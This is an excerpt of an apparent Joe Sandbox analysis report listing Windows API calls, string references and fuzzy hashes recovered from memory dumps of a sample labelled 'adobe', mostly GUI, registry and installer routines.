• 73A18830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
• 73A1A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: A18830$A122A480A570BitsFocusObject
• String ID:
• API String ID: 2231653193-0
• Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
• Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
• Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
• Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(0000000E), ref: 00418C80
• GetSystemMetrics.USER32(0000000D), ref: 00418C88
• 6F552980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
  • Part of subcall function 004099C0: 6F54C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
• 6F5BCB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
• 6F5BC740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
• 6F5BCB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
• 6F550860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: MetricsSystem$C400C740F550860F552980
• String ID:
• API String ID: 1828538299-0
• Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
• Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
• Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
• Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0048229C), ref: 00482281
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseOpen
• String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
• API String ID: 47109696-2530820420
• Opcode ID: 611116f75d8e82e5ff9034ecf45fc37e5a89b67be5737d76aba46fdeb4f9c35f
• Instruction ID: 87bf858376d3207450481095c65966a94705260f4f78797035e592602c621e2d
• Opcode Fuzzy Hash: 611116f75d8e82e5ff9034ecf45fc37e5a89b67be5737d76aba46fdeb4f9c35f
• Instruction Fuzzy Hash: 0911B230A04204AEDB10F7B6CE02B5F7BA8DB41354F1088B7A801E7692DBBCDD45875C
Uniqueness

Uniqueness Score: -1.00%

APIs
• SelectObject.GDI32(00000000,?), ref: 0041B480
• SelectObject.GDI32(?,00000000), ref: 0041B48F
• StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
• SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
• SelectObject.GDI32(?,00000000), ref: 0041B4D7
• DeleteDC.GDI32(00000000), ref: 0041B4E0
• DeleteDC.GDI32(?), ref: 0041B4E9
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ObjectSelect$Delete$Stretch
• String ID:
• API String ID: 1458357782-0
• Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
• Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
• Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
• Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
Uniqueness

Uniqueness Score: -1.00%

APIs
• 73A1A570.USER32(00000000,?,?,00000000), ref: 00493B7D
  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
• SelectObject.GDI32(00000000,00000000), ref: 00493B9F
• GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,0049411D), ref: 00493BB3
• GetTextMetricsA.GDI32(00000000,?), ref: 00493BD5
• 73A1A480.USER32(00000000,00000000,00493BFF,00493BF8,?,00000000,?,?,00000000), ref: 00493BF2
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00493BAA
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
• API String ID: 1435929781-222967699
• Opcode ID: 50f57fb69113b7d2d502807a16d2e654426cf5b09d74d84ab9d1dc1b998f164d
• Instruction ID: 1fbb7d20c9a9065d84e9e10db6abc602dd2856f8c598f1399c904acfceb0a9fe
• Opcode Fuzzy Hash: 50f57fb69113b7d2d502807a16d2e654426cf5b09d74d84ab9d1dc1b998f164d
• Instruction Fuzzy Hash: BE018876644604BFDB00EFA9CC42F5EB7ECDB49705F514476B604E7281D678AE008B24
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCursorPos.USER32 ref: 004233BF
• WindowFromPoint.USER32(?,?), ref: 004233CC
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
• GetCurrentThreadId.KERNEL32 ref: 004233E1
• SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
• SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
• SetCursor.USER32(00000000), ref: 00423423
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
• String ID:
• API String ID: 1770779139-0
• Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
• Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
• Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
• Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 004939A0
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004939AD
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004939BA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                          • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                                                                          • API String ID: 667068680-2254406584
                                                                                                                                                          • Opcode ID: 14bef791376ecaf5d08d562cea50b4f2a2ad0213aa5007590d251579e9816345
                                                                                                                                                          • Instruction ID: a38205dd91106e4269d8d35c6bdf9212f34e9fda4a7f8cb7c0a7e7a7608b7ce0
                                                                                                                                                          • Opcode Fuzzy Hash: 14bef791376ecaf5d08d562cea50b4f2a2ad0213aa5007590d251579e9816345
                                                                                                                                                          • Instruction Fuzzy Hash: CAF0C292B4175467DE2069A60C82F7B6D8CCB83762F040137BD44A6282E9AD8E0542AD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(02310000,BZ2_bzDecompressInit), ref: 0045CEB1
                                                                                                                                                          • GetProcAddress.KERNEL32(02310000,BZ2_bzDecompress), ref: 0045CEC1
                                                                                                                                                          • GetProcAddress.KERNEL32(02310000,BZ2_bzDecompressEnd), ref: 0045CED1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                          • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                                                                          • API String ID: 190572456-212574377
                                                                                                                                                          • Opcode ID: 43506d9456d00cdd0f0ea186958bc5b4fe8f0295514bb571b58465650bcbb3c2
                                                                                                                                                          • Instruction ID: 455f1597211012eadddf85cdc87209e4d4cec46549f5a6c4a532c2ec0858ec3d
                                                                                                                                                          • Opcode Fuzzy Hash: 43506d9456d00cdd0f0ea186958bc5b4fe8f0295514bb571b58465650bcbb3c2
                                                                                                                                                          • Instruction Fuzzy Hash: 04F0A4B1500700DEEB24DB26BEC67272697E7A4746F24843BD819A62A3F77C0449CA9C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004564E9,0045688C,00456440,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047FACB), ref: 0042E8A9
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
                                                                                                                                                          • InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0
                                                                                                                                                            • Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004564E9,0045688C,00456440,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                                                                                            • Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                                                                                            • Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                                                                                                          • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004564E9,0045688C,00456440,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                                                                                          • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                                                                          • API String ID: 142928637-2676053874
                                                                                                                                                          • Opcode ID: a0ec9907562021e7333db6f05516d3642d49a00aa93e8de36608871adee76da8
                                                                                                                                                          • Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
                                                                                                                                                          • Opcode Fuzzy Hash: a0ec9907562021e7333db6f05516d3642d49a00aa93e8de36608871adee76da8
                                                                                                                                                          • Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,004972E7), ref: 00477842
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047784F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047785F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                          • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                                                                          • API String ID: 667068680-222143506
                                                                                                                                                          • Opcode ID: 1d6d38e64a38dd3bcd5d86bb727f9caacaa2ffd05b1ff84c79f9e0b03c9c21b8
                                                                                                                                                          • Instruction ID: 88cce81a25e8d2b86f0fb0c4d26653f0a59eab0d1c2541fbda2dfec8285107fa
                                                                                                                                                          • Opcode Fuzzy Hash: 1d6d38e64a38dd3bcd5d86bb727f9caacaa2ffd05b1ff84c79f9e0b03c9c21b8
                                                                                                                                                          • Instruction Fuzzy Hash: 0CC0C9E0644700E99A00B7B2ACC6A77255CD500B24351843B7159AA183D67C48008E6D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetFocus.USER32 ref: 0041B58E
                                                                                                                                                          • 73A1A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                                                                                          • 73A24620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                                                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                                                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                                                                                          • 73A1A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: E680$A24620A480A570Focus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3709697839-0
                                                                                                                                                          • Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                                                                                          • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                                                                                          • Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                                                                                          • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SetLastError.KERNEL32(00000057,00000000,0045C938,?,?,?,?,00000000), ref: 0045C8D7
                                                                                                                                                          • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C9A4,?,00000000,0045C938,?,?,?,?,00000000), ref: 0045C916
                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ErrorLast
• String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
• API String ID: 1452528299-1580325520
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
• GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
• 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
• 73A24620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
• 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
• 73A1A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
Similarity
• API ID: A24620MetricsSystem$A480A570
• String ID:
• API String ID: 4042297458-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowLongA.USER32(?,000000EC), ref: 0047CE82
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BEC1), ref: 0047CEA8
• GetWindowLongA.USER32(?,000000EC), ref: 0047CEB8
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CED9
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CEED
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CF09
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
• UnrealizeObject.GDI32(00000000), ref: 0041B28C
• SelectObject.GDI32(?,00000000), ref: 0041B29E
• SetBkColor.GDI32(?,00000000), ref: 0041B2C1
• SetBkMode.GDI32(?,00000002), ref: 0041B2CC
• SetBkColor.GDI32(?,00000000), ref: 0041B2E7
• SetBkMode.GDI32(?,00000001), ref: 0041B2F2
  • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
• ShowWindow.USER32(?,00000005,00000000,00496689,?,?,00000000), ref: 0049645A
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
  • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,00496482,00000000,00496655,?,?,00000005,00000000,00496689,?,?,00000000), ref: 004072BB
  • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,004555AA,00000000,00455612), ref: 0042D44D
Strings
Similarity
• API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
• String ID: .dat$.msg$IMsg$Uninstall
• API String ID: 3312786188-1660910688
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,(rI,00000000,004969CE,?,?,00000000,0049A628), ref: 00496948
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,(rI,00000000,004969CE,?,?,00000000,0049A628), ref: 00496971
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0049698A
Strings
Similarity
• API ID: File$Attributes$Move
• String ID: (rI$isRS-%.3u.tmp
• API String ID: 3839737484-3836573314
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressByteCharHandleModuleMultiProcWide
• String ID: ShutdownBlockReasonCreate$user32.dll
• API String ID: 828529508-2866557904
• Opcode ID: 0df27dc886b1d3e581021cb75878fe42988ead3057155673be0c8b1580814d82
• Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
• Opcode Fuzzy Hash: 0df27dc886b1d3e581021cb75878fe42988ead3057155673be0c8b1580814d82
• Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F
Uniqueness

